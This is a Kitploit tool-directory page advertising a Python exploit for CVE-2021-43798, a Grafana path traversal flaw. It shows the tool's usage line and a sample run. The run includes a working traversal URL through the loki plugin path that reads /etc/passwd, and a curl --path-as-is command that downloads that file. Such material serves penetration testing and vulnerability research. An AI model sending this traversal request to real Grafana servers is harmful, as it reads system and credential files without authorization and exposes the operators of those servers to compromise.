Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-43798 — Python exploit for CVE-2021-43798, a Grafana path traversal vulnerability enabling arbitrary file read via directory traversal in plugin URLs. | Kitploit
Tools/GitHubGitHub/g01d3nw01f/cve-2021-43798
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubg01d3nw01f/cve-2021-43798

CVE-2021-43798

Python exploit for CVE-2021-43798, a Grafana path traversal vulnerability enabling arbitrary file read via directory traversal in plugin URLs.

View Repository
3 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

usage: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: error: the following arguments are required: -H/--host

example: python3 grafana-exploit.py --host <target_host>

if successfuly read arbitary-file situation show the request URL and curl command

root@kitploit:~
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"

so if you wanna download file execute like above

root@kitploit:~
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
Download Tool